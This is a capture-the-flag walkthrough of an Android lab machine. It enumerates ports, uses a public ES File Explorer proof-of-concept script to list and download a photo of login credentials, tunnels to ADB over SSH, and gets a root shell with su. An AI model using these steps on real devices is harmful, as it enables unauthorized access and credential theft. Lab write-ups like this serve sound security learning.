Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.247
Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.
We have SSH (TCP 2222), FREECIV/ADB (TCP 5555), and HTTP Bukkit JSONAPI (TCP 59777) that are the major ports that we need to look at right now. Gobuster found several pages and directories that could be interesting.
gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.247:59777
Researching 5555 and 59777, we can discover ES File Explorer and it's information and vulnerabilities. Two great resources for those two ports are:
Clone the exploit repo and check the README.md file to see what commands can be run. To save time, the one we need is:
python3 poc.py --ip=10.10.10.247 -c listPics then
python3 poc.py --ip=10.10.10.247 -g /storage/emulated/0/DCIM/creds.jpg
Open the creds.jpg file and you'll have Kristi's login credentials. Apparently, having a picture of the quintessential "post-it note" is better than just the post-it note..... (PASSWORD MANAGERS!!! I'm better now). At least it's a halfway decent password, so there's that.
This is obviously a phone, in case the ES File Explore wasn't clear :D Now we have to figure out how to escalate to the phone's version of root (which if I recall is still root). The problem is that normal Linux enumeration scripts aren't going to work correctly AND we still have to find the user.txt flag. Time to go old school manual. After searching the file system, I found a few things. First, there's an SD card in this phone and the user flag is on it!
:/sdcard $ cat user.txt
Now, if you recall port 5555 ADB was filtered, but what if we could utilize port tunneling to access it?
ssh -L 5555:localhost:5555 firstname.lastname@example.org -p 2222
Then, we "should" be able to use adb connect to get another shell, hopefully as root, but we'll see.
└─$ adb connect localhost:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to localhost:5555
└─$ adb devices
List of devices attached
Notice there are two "devices" attached. We need to specify which one we want adb to connect to the shell on.
└─$ adb -s localhost:5555 shell 1 ⨯
x86_64:/ $ whoami
x86_64:/ $ su
:/ # whoami
Gotcha!!! Now we search for root.txt and this phone will be toast.
:/ # find / -name root.txt
:/data # cat root.txt
This was a completely different style of box/phone/thing.... But hey, another one down!